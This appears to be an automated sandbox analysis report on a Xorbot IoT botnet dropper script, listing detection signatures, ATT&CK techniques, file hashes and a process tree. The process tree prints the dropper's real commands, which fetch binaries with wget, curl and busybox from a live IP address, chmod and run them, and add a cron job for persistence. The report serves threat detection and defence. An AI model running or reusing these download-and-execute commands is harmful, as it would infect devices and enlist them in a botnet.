xorbot | 997c8a2082da6c3be8ea561314ab308f934b44c6b1a5a62e840c44a112796001

Analysis

max time kernel
149s
max time network
161s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
13/12/2024, 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

1f8afa9284314131e052f16e159d66ce
SHA1

5da206f6ed4b8f0ffb60a11adaf3ffb950d9214f
SHA256

997c8a2082da6c3be8ea561314ab308f934b44c6b1a5a62e840c44a112796001
SHA512

be31ead9a1c175f61812d254094e037f09fddc2a787f2837312867cb060ae4563f099084f5ea2c66edc2d2a02e58418806cb4fefdb0b9b5e2fa8c75527929bfe
SSDEEP

192:+OS9uWk+WfARcu26hOOcwKXKbKCKdK1KC+s926hOOcMKXKbKCKdK1K/OS9uWl:D+WoRc3faWxIwCfSjaWxIw1

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 2 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-3.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2011) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
685	chmod
726	chmod
755	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8	686	aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
/tmp/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF	727	9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
/tmp/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8	757	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8

Renames itself 1 IoCs

pid	Process
758	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.3Vm2ct	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 3 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/826/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/883/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/886/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/18/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/646/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/928/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/950/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1061/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1063/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/852/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/926/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/638/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/800/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/805/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/947/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/17/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/271/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/857/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/858/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/887/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/910/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/958/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/981/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/156/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/273/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1004/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/990/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/849/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/936/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/834/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/836/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/848/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/870/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/878/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/889/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/12/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/285/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/893/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/829/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/833/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1021/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/275/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/856/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/915/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/921/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/940/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/949/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/980/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/95/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/647/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/942/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1009/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1039/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/16/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/894/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/817/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/819/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/840/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/998/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1017/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/1077/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/25/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
File opened for reading	/proc/317/cmdline	aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF	wget
File opened for modification	/tmp/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF	curl
File opened for modification	/tmp/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8	wget
File opened for modification	/tmp/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8	busybox
File opened for modification	/tmp/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8	wget
File opened for modification	/tmp/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8	curl
File opened for modification	/tmp/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8	busybox
File opened for modification	/tmp/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF	busybox
File opened for modification	/tmp/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:648
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:650
- /usr/bin/wget
  wget http://216.126.231.164/bins/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  2⤵
  - Writes file to tmp directory
  PID:652
- /usr/bin/curl
  curl -O http://216.126.231.164/bins/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:676
- /bin/busybox
  /bin/busybox wget http://216.126.231.164/bins/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  2⤵
  - Writes file to tmp directory
  PID:678
- /bin/chmod
  chmod 777 aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  2⤵
  - File and Directory Permissions Modification
  PID:685
- /tmp/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  ./aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  2⤵
  - Executes dropped EXE
  PID:686
- /bin/rm
  rm aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8
  2⤵
  PID:689
- /usr/bin/wget
  wget http://216.126.231.164/bins/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  2⤵
  - Writes file to tmp directory
  PID:691
- /usr/bin/curl
  curl -O http://216.126.231.164/bins/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:704
- /bin/busybox
  /bin/busybox wget http://216.126.231.164/bins/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  2⤵
  - Writes file to tmp directory
  PID:718
- /bin/chmod
  chmod 777 9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  ./9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  2⤵
  - Executes dropped EXE
  PID:727
- /bin/rm
  rm 9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF
  2⤵
  PID:729
- /usr/bin/wget
  wget http://216.126.231.164/bins/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  2⤵
  - Writes file to tmp directory
  PID:731
- /usr/bin/curl
  curl -O http://216.126.231.164/bins/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:736
- /bin/busybox
  /bin/busybox wget http://216.126.231.164/bins/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  2⤵
  - Writes file to tmp directory
  PID:749
- /bin/chmod
  chmod 777 aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  ./aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:757
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:759
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:760
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:762
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:763
- /bin/rm
  rm aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8
  2⤵
  PID:776
- /usr/bin/wget
  wget http://216.126.231.164/bins/Qv1jRvwe7pDWLlLIUFKQ7nWNv8KGptUQY7
  2⤵
  PID:779

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/9wwciXBB5Sk4IIgYMv4Kjr9n16hnoTfJvF

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit
/tmp/aJ6sZiD3BHV8W6tCLuPZU7SUAstu9wpYY8

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit
/tmp/aqToaKsvt4uadKs36xts2GPWcpSaNVTqA8

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.3Vm2ct

Filesize
210B

MD5
8749d0799d64b739da6a7b1c1ae6e36d

SHA1
ef01ef39d2f9cf9dedc8f804319658ad5e378b21

SHA256
5342768c4fb9d0381b9661f297843b7cdafad10669980da60b824885418b1ea3

SHA512
81e1ce544962c43bbab3263e14194b6ed6a62a2effcd71c6dfc64eae86df41ef8d5c3a43c2b3c65ca3a686c12aacbe12b1c20d484392afb6995f084b07b00660

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads